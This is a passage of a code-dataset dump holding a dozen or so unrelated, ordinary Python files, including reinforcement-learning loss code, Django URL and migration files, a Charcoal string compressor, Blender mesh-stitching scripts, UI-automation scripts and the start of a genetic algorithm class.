F.smooth_l1_loss(target_dist, curr_dist, reduction=\"none\")\n huber_loss = (\n (\n dist_diff\n * (tau_hats.unsqueeze(2) - (target_dist - curr_dist).detach().le(0.0).float()).abs()\n )\n .sum(-1)\n .mean(1)\n )\n quantile_loss = (huber_loss * weight).mean()\n # ref: https://github.com/ku2482/fqf-iqn-qrdqn.pytorch/\n # blob/master/fqf_iqn_qrdqn/agent/qrdqn_agent.py L130\n batch.weight = dist_diff.detach().abs().sum(-1).mean(1) # prio-buffer\n # calculate fraction loss\n with torch.no_grad():\n sa_quantile_hats = curr_dist_orig[np.arange(len(act)), act, :]\n sa_quantiles = out.quantiles_tau[np.arange(len(act)), act, :]\n # ref: https://github.com/ku2482/fqf-iqn-qrdqn.pytorch/\n # blob/master/fqf_iqn_qrdqn/agent/fqf_agent.py L169\n values_1 = sa_quantiles - sa_quantile_hats[:, :-1]\n signs_1 = sa_quantiles > torch.cat(\n [sa_quantile_hats[:, :1], sa_quantiles[:, :-1]],\n dim=1,\n )\n\n values_2 = sa_quantiles - sa_quantile_hats[:, 1:]\n signs_2 = sa_quantiles < torch.cat(\n [sa_quantiles[:, 1:], sa_quantile_hats[:, -1:]],\n dim=1,\n )\n\n gradient_of_taus = torch.where(signs_1, values_1, -values_1) + torch.where(\n signs_2,\n values_2,\n -values_2,\n )\n fraction_loss = (gradient_of_taus * taus[:, 1:-1]).sum(1).mean()\n # calculate entropy loss\n entropy_loss = out.fractions.entropies.mean()\n fraction_entropy_loss = fraction_loss - self._ent_coef * entropy_loss\n self._fraction_optim.zero_grad()\n fraction_entropy_loss.backward(retain_graph=True)\n self._fraction_optim.step()\n self.optim.zero_grad()\n quantile_loss.backward()\n self.optim.step()\n self._iter += 1\n return {\n \"loss\": quantile_loss.item() + fraction_entropy_loss.item(),\n \"loss/quantile\": quantile_loss.item(),\n \"loss/fraction\": fraction_loss.item(),\n \"loss/entropy\": entropy_loss.item(),\n }\n","sub_path":"tianshou/policy/modelfree/fqf.py","file_name":"fqf.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"203533076","text":"from django.conf.urls import patterns, url\n\nfrom manager import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index2, name='index2'),\n url(r'^view/$', views.view, name='view'),\n # url(r'^add/$', views.add, name='add'),\n url(r'^contact_us/$', views.contact_us, name='contact_us'),\n # url(r'^handle_add/$', views.handle_add, name='handle_add'),\n url(r'^view/edit/(?P\\d+)/$', views.edit, name='edit'),\n url(r'^view/delete/(?P\\d+)/$', views.delete, name='delete'),\n url(r'api/post_data', views.post_config),\n url(r'^exp/$', views.exp, name='exp'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^adminpage/$', views.adminpage, name='adminpage'),\n url(r'^handle_edit/$', views.handle_edit, name='handle_edit'),\n url(r'^add_offline_stock/$', views.add_offline_stock, name='add_offline_stock'),\n url(r'^view_offline_stock/$', views.view_offline_stock, name='view_offline_stock'),\n url(r'^handle_offline_add/$', views.handle_offline_add, name='handle_offline_add'),\n url(r'^view_offline_stock/edit/(?P\\d+)$', views.editoffline, name='editoffline'),\n url(r'^view_offline_stock/delete/(?P\\d+)$', views.deleteoffline, name='deleteoffline'),\n url(r'^handle_offline_edit/$', views.handle_offline_edit, name='handle_offline_edit'),\n url(r'^expoffline/$', views.expoffline, name='expoffline'),\n url(r'^expfull/$', views.expfull, name='expfull'),\n url(r'^search/$', views.search, name='search'),\n url(r'^searchoffline/$', views.searchoffline, name='searchoffline'),\n) \n","sub_path":"invent_manage/manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"631804211","text":"def Test():\n s=input()\n s=s.replace(\"s\",\" \")\n s=s.replace(\"t\",\" \")\n s=s.replace(\"\\\"\",\" \")\n s=s.replace(\"=\",\" \")\n s=s.replace(\" \",\"\")\n q=s.split(\",\")\n word1=q[0]\n word2=q[1]\n maps1=[]\n maps2=[]\n if(len(word1)!=len(word2)):\n print(\"false\")\n else:\n for i in range(0,128):\n maps1.append(0)\n maps2.append(0)\n for i in range(0,len(word1)):\n maps1[ord(word1[i])]=maps1[ord(word1[i])]+1\n maps2[ord(word2[i])]=maps2[ord(word2[i])]+1\n if(check(maps1,maps2)):\n print(\"true\")\n else:\n print(\"false\")\n\ndef check(a,b):\n for i in range(0,len(a)):\n if(a[i]!=b[i]):\n return False\n return True\n\nif __name__ == \"__main__\":\n Test()","sub_path":"Code/CodeRecords/2445/60595/238455.py","file_name":"238455.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467232279","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Effort',\n fields=[\n ('id', models.BigIntegerField(serialize=False, primary_key=True)),\n ('name', models.TextField()),\n ('elapsed_time', models.IntegerField()),\n ('moving_time', models.IntegerField()),\n ('start_date', models.DateTimeField()),\n ],\n ),\n migrations.CreateModel(\n name='Profile',\n fields=[\n ('user', models.OneToOneField(related_name='profile', primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),\n ('pic', models.URLField()),\n ],\n ),\n migrations.CreateModel(\n name='Segment',\n fields=[\n ('id', models.IntegerField(serialize=False, primary_key=True)),\n ('name', models.TextField()),\n ],\n ),\n migrations.CreateModel(\n name='StarredSegment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('segment', models.ForeignKey(related_name='+', to='core.Segment')),\n ('user', models.ForeignKey(related_name='starred_segments', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='effort',\n name='segment',\n field=models.ForeignKey(related_name='efforts', to='core.Segment'),\n ),\n migrations.AddField(\n model_name='effort',\n name='user',\n field=models.ForeignKey(related_name='efforts', to=settings.AUTH_USER_MODEL),\n ),\n ]\n","sub_path":"core/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"377673160","text":"from codepage import OrdinalLookup, Codepage\nfrom string import ascii_lowercase, ascii_uppercase, digits\nimport re\n\nsymbols = \".!\\\"#$%&'()*+,-/:;<=>?@[\\]^_`{|}~\"\nwhitespace = \"\\n \"\ndefault_order = \"wslnu\"\ncharset_fragment_lookup = {\n \"w\": whitespace, \"s\": symbols, \"l\": ascii_lowercase, \"n\": digits,\n \"u\": ascii_uppercase\n}\ndefault_charset = (\n whitespace + symbols + ascii_lowercase + digits + ascii_uppercase\n)\nCodepage.remove(\"”\")\ngap = OrdinalLookup[\"”\"]\n\n\ndef Compressed(string):\n \"\"\"\n Compressed(string) -> str\n Returns the shortest Charcoal compressed literal of the given string.\n\n \"\"\"\n if not string:\n return \"””\"\n if not all(\n character == \"¶\" or character >= \" \" and character <= \"~\"\n for character in string\n ):\n return string\n original_string, string = string, re.sub(\"¶\", \"\\n\", string)\n compressed_permuted = CompressPermutations(string)\n compressed = CompressString(string)\n string_length = len(original_string) - 2\n if (\n string_length < len(compressed_permuted) and\n string_length < len(compressed)\n ):\n return original_string\n if len(compressed_permuted) < len(compressed):\n return \"”\" + compressed_permuted + \"”\"\n else:\n return \"“\" + compressed + \"”\"\n\n\ndef CompressPermutations(string):\n \"\"\"\n CompressPermutations(string) -> str\n Returns without delimiters the given string compressed \\\nusing a permuted codepage, without delimiters.\n\n \"\"\"\n numeric = lowercase = uppercase = whitespace = symbol = 0\n for character in string:\n if character >= \"0\" and character <= \"9\":\n numeric -= .1\n elif character >= \"a\" and character <= \"z\":\n lowercase -= 0.03846\n elif character >= \"A\" and character <= \"Z\":\n uppercase -= 0.03846\n elif character == \"\\n\" or character == \" \":\n whitespace -= .5\n else:\n symbol -= .03125\n result = \"\".join(map(lambda t: t[1], sorted([\n (whitespace, \"w\"), (symbol, \"s\"), (lowercase, \"l\"), (numeric, \"n\"),\n (uppercase, \"u\")\n ])))\n index, base = 0, 5\n charset = \"\".join(\n charset_fragment_lookup[character] for character in result\n )\n for character in default_order[:-1]:\n index = index * base + result.index(character)\n result = result.replace(character, \"\", 1)\n base -= 1\n return Codepage[index] + Compress([\n charset.index(character) for character in string\n ])\n\n\ndef CompressString(string):\n \"\"\"\n CompressString(string) -> str\n Returns without delimiters the given string compressed.\n\n \"\"\"\n return Compress([\n default_charset.index(character) for character in string\n ])\n\n\ndef Compress(ordinals):\n \"\"\"\n Compress(ordinals) -> str\n Returns without delimiters the given string compressed.\n\n \"\"\"\n base, result, number = max(ordinals) + 1, \"\", 1\n if base == 1:\n number = len(ordinals)\n else:\n for ordinal in ordinals:\n number = number * base + ordinal\n while number:\n result = Codepage[number % 255] + result\n number //= 255\n return Codepage[base - 1] + result\n\n\ndef Decompressed(string):\n \"\"\"\n Decompressed(string) -> str\n Returns the decompressed form of the given Charcoal string.\n\n \"\"\"\n if string == \"””\":\n return \"\"\n if string[-1] != \"”\":\n return string\n if string[0] == \"”\":\n return DecompressPermutations(string[1:-1])\n elif string[0] == \"“\":\n return DecompressString(string[1:-1])\n\n\ndef DecompressPermutations(string):\n \"\"\"\n DecompressPermutations(string) -> str\n Returns the original form of the given string compressed \\\nusing a permuted codepage, passed without delimiters.\n\n \"\"\"\n index = OrdinalLookup.get(string[0], ord(string[0]))\n if index > gap:\n index -= 1\n base = 2\n letters = [\"u\"]\n while index:\n letters.insert(index % base, default_order[5 - base])\n index //= base\n base += 1\n while base <= 5:\n letters.insert(0, default_order[5 - base])\n base += 1\n charset = \"\".join(\n charset_fragment_lookup[character] for character in letters\n )\n return \"\".join([\n charset[ordinal] for ordinal in Decompress(string[1:])\n ])\n\n\ndef DecompressString(string):\n \"\"\"\n DecompressString(string) -> str\n Returns the original form of the given string compressed, \\\npassed without delimiters.\n\n \"\"\"\n return \"\".join([\n default_charset[ordinal] for ordinal in Decompress(string)\n ])\n\n\ndef Decompress(string):\n \"\"\"\n Decompress(string) -> list\n Returns the ordinals in the original form of the given string compressed.\n\n \"\"\"\n number, result = 0, []\n base = OrdinalLookup.get(string[0], ord(string[0])) + 1\n if base > gap:\n base -= 1\n for character in string[1:]:\n ordinal = OrdinalLookup.get(character, ord(character))\n number = (number * 255) + ordinal - (ordinal > gap)\n if base == 1:\n return [ord(\"\\n\")] * number\n while number > 1:\n remainder = number % base\n result = [remainder] + result\n number //= base\n return result\n","sub_path":"compression.py","file_name":"compression.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"269246440","text":"import random\r\nimport sys\r\n\r\nl = 3\r\ntry:\r\n length = sys.argv[1]\r\n l = int(length)\r\nexcept ValueError:\r\n print(\"{} isn't a number!\".format(length))\r\nexcept IndexError:\r\n print(\"No arguments were provided\")\r\n\r\nmaxrounds = 2 ** l + l \r\n\r\nnumber = random.randint(0, 10 ** l)\r\nprint(\"Let's play the mimsmind1 game. You have {} guesses\".format(maxrounds))\r\n\r\nguess = input(\"Guess a {}-digit number: \".format(l))\r\n\r\nwhile maxrounds >= 0:\r\n guess = int(guess)\r\n if guess > number:\r\n guess = input(\"Try again. Guess a lower number: \")\r\n maxrounds -=1\r\n elif guess < number:\r\n guess = input(\"Try again. Guess a higher number: \")\r\n maxrounds -=1\r\n elif guess == number:\r\n maxrounds -=1\r\n print(\"Congratulations. You guessed the correct number in {} tries.\".format(maxrounds))\r\n break\r\n else:\r\n print(\"Seems like it is not a number. Try next time. Bye!\")\r\n break\r\nprint(\"Sorry, you are out of tries\")\r\n","sub_path":"mimsmind1.py","file_name":"mimsmind1.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"140899432","text":"from __future__ import print_function\nimport json\n\nimport requests\n\nmovie_json = \"\"\"\n{\n\"Title\":\"Circut\",\n\"Year\":\"2000\",\n\"Runtime\":\"130 min\",\n\"Country\":\"USA\"\n}\n\"\"\"\n\nmovie_data = json.loads(movie_json)\nprint(movie_data)\nprint(\"Movie title from static json:\")\nprint(movie_data['Title'])\nprint()\n\nurl = 'http://www.omdbapi.com/?y=&plot=short&r=json&t=true&s=silicon'\nresp = requests.get(url)\nsearch_results = resp.json()['Search']\nprint(search_results)\n\nprint(\"Movies with circuit title:\")\nfor m in search_results:\n print(\" * \" + m['Title'])\n","sub_path":"h_json.py","file_name":"h_json.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"520958598","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 6 15:33:54 2021\n\n@author: kariln\n\nSPATIAL FEATURES\n\"\"\"\nfrom scipy.spatial import distance\nfrom datetime import datetime\nfrom functions import column_check\n\ndef euclidean(data):\n now = datetime.now()\n print('Euclidean: ' + str(now))\n column_check(data,['Q_x','Q_y','Q_z','x','y','z'])\n data['euclidean_d_Q'] = None\n for index, row in data.iterrows():\n a = (row['Q_x'], row['Q_y'], row['Q_z'])\n b = (row['x'], row['y'], row['z'])\n dst = distance.euclidean(a, b)\n data['euclidean_d_Q'].iloc[index] = dst\n data.to_csv('disp_Pint.csv',encoding='utf-8', index=False) \n return data\n\ndef manhattan(data):\n now = datetime.now()\n print('Manhattan: ' + str(now))\n column_check(data,['Q_x','Q_y','Q_z','x','y','z'])\n data['manh_d_Q'] = None\n for index, row in data.iterrows():\n a = (row['Q_x'], row['Q_y'], row['Q_z'])\n b = (row['x'], row['y'], row['z'])\n dst = distance.cityblock(a, b)\n data['manh_d_Q'].iloc[index] = dst\n data.to_csv('disp_Pint.csv',encoding='utf-8', index=False) \n return data\n\ndef laser_distance(data):\n now = datetime.now()\n print('Laser distance: ' + str(now))\n column_check(data,['Q_x','Q_y','Q_z','x','y','z','road_width','layer_thickness'])\n data['d_Q_x'] = None\n data['d_Q_y'] = None\n data['d_Q_z'] = None\n for index, row in data.iterrows():\n data['d_Q_x'].iloc[index] = abs(row['Q_x']-row['x'])/row['road_width']\n data['d_Q_y'].iloc[index] = abs(row['Q_y']-row['y'])/row['road_width']\n data['d_Q_z'].iloc[index] = abs(row['Q_z']-row['z'])/row['layer_thickness']\n data.to_csv('disp_d_Q.csv',encoding='utf-8', index=False) \n return data\n\ndef euclid_grad(data):\n now = datetime.now()\n print('Euclidean gradient: ' + str(now))\n column_check(data,['euclidean_d_Q'])\n data['euclid_grad'] = None\n num_i = data['i'].nunique()\n i = data['i'].unique()\n for j in range(0,num_i):\n data_i = data[data['i'] == i[j]] \n indexes = data_i.index\n num = 0\n for index,row in data_i.iterrows():\n if num == 0: \n data['euclid_grad'].iloc[index] = 0\n else:\n data['euclid_grad'].iloc[index] = data['euclidean_d_Q'].iloc[indexes[num]]-data['euclidean_d_Q'].iloc[indexes[num-1]]\n num += 1\n data.to_csv('disp_grad.csv',encoding='utf-8', index=False) \n return data\n\ndef laser_dir(data):\n now = datetime.now()\n print('Laser direction: ' + str(now))\n column_check(data,['euclid_grad'])\n data['laser_dir'] = None\n for index,row in data.iterrows():\n if row['euclid_grad'] > 0: \n data['laser_dir'].iloc[index] = 1\n else:\n data['laser_dir'].iloc[index] = 0\n data.to_csv('disp_dir.csv',encoding='utf-8', index=False) \n return data\n\ndef layerNum(data, nr_layers: int):\n now = datetime.now()\n print('Layer number: ' + str(now))\n column_check(data,['z','layer_thickness','basedepth'])\n data['layerNum'] = None\n layer_thickness = data['layer_thickness'].iloc[0]\n base_height = data['basedepth'].iloc[0]\n \n #Finding layer numbers and heights\n layers = []\n heights = []\n height = base_height\n for i in range(1,nr_layers + 1): \n layers.append(i)\n height = round(height+layer_thickness,4)\n heights.append(height)\n #Inserting layer numbers\n for index,row in data.iterrows():\n if round(row['z'],4) == base_height:\n data['layerNum'].iloc[index] = 1\n else:\n layer = 0\n for height in heights:\n if round(row['z'],4) == height:\n layer += 1\n data['layerNum'].iloc[index] = layer\n break\n data.to_csv('disp_layer.csv',encoding='utf-8', index=False) \n return data\n\ndef spatial(data, nr_layers: int):\n now = datetime.now()\n print('Spatial: ' + str(now))\n data = layerNum(data, nr_layers)\n data = euclidean(data)\n data = manhattan(data)\n data = euclid_grad(data)\n data = laser_dir(data)\n data = laser_distance(data)\n return data\n","sub_path":"Preprocessing/feature_extraction/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457700821","text":"import bpy\nimport bmesh\nimport pickle\n\ndef wrt_base(mesh_index):\n # Get the active mesh\n obj = bpy.context.editable_objects[mesh_index]\n me = obj.data\n\n bpy.ops.object.editmode_toggle()\n # Get a BMesh representation\n bm = bmesh.from_edit_mesh(me)\n\n bm.faces.active = None\n\n bm.verts.ensure_lookup_table()\n\n maxx = minx = bm.verts[0].co.x \n maxy = miny = bm.verts[0].co.y\n maxz = minz = bm.verts[0].co.z\n\n # Modify the BMesh, can do anything here...\n for v in bm.verts:\n if(v.co.x > maxx):\n maxx = v.co.x\n elif(v.co.x < minx):\n minx = v.co.x\n if(v.co.y > maxy):\n maxy = v.co.y\n elif(v.co.y < miny):\n miny = v.co.y\n if(v.co.z > maxz):\n maxz = v.co.z\n elif(v.co.z < minz):\n minz = v.co.z\n \n res = (maxx, minx, maxy, miny, maxz, minz)\n rx = maxx-minx\n ry = maxy-miny\n rz = maxz-minz\n \n with open('/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/base_stats', 'rb') as fp:\n base = pickle.load(fp)\n \n bmaxx, bminx, bmaxy, bminy, bmaxz, bminz = base\n brx = bmaxx-bminx\n bry = bmaxy-bminy\n brz = bmaxz-bminz\n\n #print(rx, brx)\n #print(ry, bry)\n #print(rz, brz)\n\n sx = rx/brx\n sy = ry/bry\n sz = (sx+sy)/2\n\n print(sx, sy, sz)\n #print(minz, bminz)\n scale = (sx, sy, sz)\n zdisp = max(bminz-minz, 0) + 60 * (sz-1)\n bpy.ops.object.editmode_toggle()\n \n return scale, zdisp\n\n\nmesh = 'face1-texture'\n\nbpy.ops.import_mesh.ply(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/backHead2.ply')\nbpy.ops.import_mesh.ply(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/'+mesh+'.ply')\n\nindex = -1\nfor i, obj in enumerate(bpy.context.editable_objects):\n if(obj.name==mesh):\n index = i\n break\n\nscale, zdisp = wrt_base(index)\n\nprint(zdisp)\n\nbpy.data.objects['backHead2'].scale = scale\nbpy.data.objects['backHead2'].location[2] = -zdisp\n\nbpy.ops.object.join()\nobj = bpy.context.editable_objects[0]\nme = obj.data\n\nbpy.ops.object.editmode_toggle()\n# Get a BMesh representation\nbm = bmesh.from_edit_mesh(me)\n\nbm.faces.active = None\n\nwith open('/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/edge_loops', 'rb') as f:\n toBeSelected = pickle.load(f)\n \nwith open('/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/border_verts', 'rb') as f:\n toBeSelectedVerts = pickle.load(f)\n\nbm.verts.ensure_lookup_table()\nbm.edges.ensure_lookup_table()\n\nlst = []\n# Modify the BMesh, can do anything here...\nfor v in bm.verts:\n v.select = False\n \nfor e in bm.edges:\n e.select = False\n \nfor index in toBeSelectedVerts:\n bm.verts[index].select = True\n \nfor index in toBeSelected:\n bm.edges[index].select = True\n\n# Show the updates in the viewport\n# and recalculate n-gon tessellation.\nbmesh.update_edit_mesh(me, True)\n\nbpy.ops.mesh.bridge_edge_loops()\nbpy.ops.mesh.remove_doubles()\nbpy.ops.object.mode_set(mode=\"OBJECT\")\nbpy.ops.object.shade_smooth()\n\nbpy.ops.export_mesh.ply(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/'+mesh+'_full.ply', use_normals=False, use_uv_coords=False)\n\nglass_folder = 'sun_glasses'\n\nbpy.ops.import_scene.gltf(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/align_gltf/all gltf/'+glass_folder+'_align/scene.gltf')\n#bpy.ops.import_mesh.ply(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/'+mesh+'_full.ply')\n\nfor i, obj in enumerate(bpy.context.editable_objects):\n if(obj.name.find('roshan')!=-1):\n obj.scale = scale\n\nbpy.ops.export_scene.gltf(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/align_gltf/all gltf/'+glass_folder+'_total/scene.gltf')\n\n","sub_path":"face_stitch/add_glasses.py","file_name":"add_glasses.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"54265211","text":"from django.core.management.base import BaseCommand, CommandError\nfrom permits.models import Applicant, Permit, Zoning\nimport os\nimport csv\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n counter = 1\n filepath = os.path.join( os.path.dirname ( __file__ ), '..', '..', 'data' )\n zoning_csv = open(os.path.join(filepath, 'zoning.csv'))\n zonings = csv.DictReader(zoning_csv)\n\n for zoning in zonings:\n try:\n permit_nr = zoning['apno']\n permit = Permit.objects.get(permit_nr = permit_nr)\n Zoning.objects.create(permit_nr=permit, **zoning)\n print(\"saving record %s\") % counter\n counter += 1\n except Permit.DoesNotExist:\n print(\"Permit.DoesNotExist\")\n","sub_path":"permits/management/commands/import_zoning.py","file_name":"import_zoning.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"283568486","text":"from ADB import AutoDatabank, t180, t365, somedays, namesstt\nfrom ADB import swtime, timedelta, two_check_time, checktime\nfrom datetime import timedelta\nfrom ADB import set_pause,click2,doubleclick_after_exist,deletelogic,yanzheng_logic\nimport threading,time\nimport pickle, xlrd\nfrom datetime import datetime\nimport pyautogui,pyperclip\nimport pandas as pd\nfrom xlutils.copy import copy\nfrom ADB.positiondf import *\n\ndef get_pplnumber_12(islaoke,ts,te,ts2,te2,nori,xn,savepath):\n\toutcount = 0\n\tn = nori\n\twhile n <= xn:\n\t\ttry:\n\t\t\tRB.cp()\n\t\t\tif n < xn:\n\t\t\t\tRB.zszw([n,n],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([n,999],ts,te,1)\n\n\t\t\tRB.dp(5,ts2,te2,3)\n\t\t\tif islaoke:\n\t\t\t\tRB.zszw([1,999],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([1,999],ts,te,3)\n\n\t\t\t#验证逻辑数\n\t\t\tyanzheng_logic(3)\n\n\t\t\tclick2((1340,1018))\n\t\t\tpyperclip.copy('')\n\t\t\tcount = 0\n\t\t\twhile pyperclip.paste().strip() == '':\n\t\t\t\tpyautogui.doubleClick((1220,1020))\n\t\t\t\tpyautogui.hotkey('ctrl', 'c')\n\t\t\t\tcount += 1\n\t\t\t\ttime.sleep(1)\n\t\t\t\tif count > 70:\n\t\t\t\t\traise AssertionError\n\t\t\ttry:\n\t\t\t\tpplnumber = int(''.join(pyperclip.paste().split(',')))\n\t\t\texcept:\n\t\t\t\traise AssertionError\n\t\t\t'''\n\t\t\tfor i in range(5):\n\t\t\t\tdeletelogic()\n\t\t\t\ttime.sleep(1.2)\n\t\t\t#info = pd.DataFrame({'date':ppldate,'number':pplnumber},index=None)\n\t\t\t#info.to_excel(r'E:\\git\\adbscript\\adirenqun\\Arenqun.xlsx',index=None,header=True)\n\t\t\t'''\n\t\t\tworkbook = xlrd.open_workbook(savepath, formatting_info=True)\n\t\t\tsheet = workbook.sheet_by_index(0)\n\t\t\trowNum = sheet.nrows\n\t\t\tcolNum = sheet.ncols\n\t\t\tnewbook = copy(workbook)\n\t\t\tnewrow = newbook.get_sheet(0)\n\t\t\t# 在末尾增加新行\n\t\t\tnewrow.write(rowNum, 1, pplnumber)\n\t\t\tnewrow.write(rowNum, 0, n)\n\t\t\t# 覆盖保存\n\t\t\tnewbook.save(savepath)\n\n\t\t\tn += 1\n\n\t\texcept (AssertionError,ValueError):\n\t\t\toutcount += 1\n\t\t\tif outcount < 5:\n\t\t\t\tget_pplnumber_12(islaoke,ts,te,ts2,te2,n,xn,savepath)\n\t\t\telse:\n\t\t\t\tworkbook = xlrd.open_workbook(savepath, formatting_info=True)\n\t\t\t\tsheet = workbook.sheet_by_index(0)\n\t\t\t\trowNum = sheet.nrows\n\t\t\t\tcolNum = sheet.ncols\n\t\t\t\tnewbook = copy(workbook)\n\t\t\t\tnewrow = newbook.get_sheet(0)\n\t\t\t\t# 在末尾增加新行\n\t\t\t\tnewrow.write(rowNum, 1, '超时')\n\t\t\t\tnewrow.write(rowNum, 0, n)\n\t\t\t\t# 覆盖保存\n\t\t\t\tnewbook.save(savepath)\n\n\t\t\t\tn += 1\n\t\t\t\tget_pplnumber_12(islaoke,ts,te,ts2,te2,n,xn,savepath)\n\ndef get_pplnumber_34(islaoke,ts,te,ts2,te2,nori,xn):\n\toutcount = 0\n\tn = nori\n\twhile n <= xn:\n\t\ttry:\n\t\t\tRB.cp()\n\t\t\tRB.zdy('【辅】618A',1)\n\n\t\t\tif n < xn:\n\t\t\t\tRB.zszw([n,n],ts,te,2)\n\t\t\telse:\n\t\t\t\tRB.zszw([n,999],ts,te,2)\n\n\t\t\tRB.dp(5,ts,te,1)\n\n\t\t\tRB.dp(5,ts2,te2,1)\n\t\t\tif islaoke:\n\t\t\t\tRB.zszw([1,999],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([1,999],ts,te,3)\n\n\t\t\t#验证逻辑数\n\t\t\tyanzheng_logic(5)\n\t\t\tif islaoke:\n\t\t\t\tRB.sp('3老客交曝光%s次' % n)\n\t\t\telse:\n\t\t\t\tRB.sp('4新客交曝光%s次' % n)\n\n\n\t\t\tn += 1\n\n\t\texcept (AssertionError,ValueError):\n\t\t\toutcount += 1\n\t\t\tif outcount < 5:\n\t\t\t\tget_pplnumber_34(islaoke,ts,te,ts2,te2,n,xn)\n\t\t\telse:\n\t\t\t\tn += 1\n\t\t\t\tget_pplnumber_34(islaoke,ts,te,ts2,te2,n,xn)\n\ndef get_pplnumber_12new(islaoke,ts,te,ts2,te2,nori,xn):\n\toutcount = 0\n\tn = nori\n\twhile n <= xn:\n\t\ttry:\n\t\t\tRB.cp()\n\t\t\tif n < xn:\n\t\t\t\tRB.zszw([n,n],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([n,999],ts,te,1)\n\n\t\t\tRB.dp(5,ts2,te2,3)\n\n\t\t\tif islaoke:\n\t\t\t\tRB.zszw([1,999],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([1,999],ts,te,3)\n\n\t\t\t#验证逻辑数\n\t\t\tyanzheng_logic(3)\n\t\t\tif islaoke:\n\t\t\t\tRB.sp('1老客交曝光%s次' % n)\n\t\t\telse:\n\t\t\t\tRB.sp('2新客交曝光%s次' % n)\n\n\n\t\t\tn += 1\n\n\t\texcept (AssertionError,ValueError):\n\t\t\toutcount += 1\n\t\t\tif outcount < 5:\n\t\t\t\tget_pplnumber_12new(islaoke,ts,te,ts2,te2,n,xn)\n\t\t\telse:\n\t\t\t\tn += 1\n\t\t\t\tget_pplnumber_12new(islaoke,ts,te,ts2,te2,n,xn)\n\n\n\n\nRB = AutoDatabank(coordfile = '2019-06-21', account = 'ATzh', purchase_Behaviour='dp')\n\nif __name__ == '__main__':\n\tset_pause(0.2, 0.2)\n\n\tts = '2019-05-29'\n\tte = '2019-06-18'\n\tts2 = '2018-07-12'\n\tte2 = '2019-05-28'\n\n\t'''\n\tsavepath = r'E:\\git\\adbscript\\rb\\rb1.xls'\n\tget_pplnumber_12(True,ts,te,ts2,te2,1,15,savepath)\n\tsavepath = r'E:\\git\\adbscript\\rb\\rb2.xls'\n\tget_pplnumber_12(False,ts,te,ts2,te2,1,15,savepath)\n\t'''\n\tget_pplnumber_12new(True,ts,te,ts2,te2,1,15)\n\tget_pplnumber_12new(False,ts,te,ts2,te2,1,15)\n\tget_pplnumber_34(True,ts,te,ts2,te2,1,15)\n\tget_pplnumber_34(False,ts,te,ts2,te2,1,15)\n\n","sub_path":"zzpc.py","file_name":"zzpc.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"114701282","text":"import copy\nimport math\nimport os\nimport random\nfrom typing import Dict, List\n\nfrom src.Chromosome import Chromosome\nfrom src.NetworkModel import NetworkModel\nfrom src.NetworkVisualizer import NetworkVisualizer\n\n\nclass GeneticAlgorithm:\n def __init__(self, network: NetworkModel, n: int, epochs: int, mutationFactor: int, singleMode: bool,\n xoverChance: float, selection: str, succession: str, modularity: int, xoverMode: str):\n self.network = network\n self.n = n\n self.epochs = epochs\n self.mutationFactor = mutationFactor\n self.singleMode = singleMode\n self.xoverChance = xoverChance\n self.xoverMode = xoverMode\n self.selection = selection\n self.succession = succession\n self.modularity = modularity\n\n # Used for tracing algorithm progress\n self.costHistory: List[float] = []\n self.changesHistory: List[int] = []\n self.lastSamePos = 0\n self.lastSameVal = 0.0\n\n # Create initial population\n self.population = [Chromosome(network, singleMode, k=modularity) 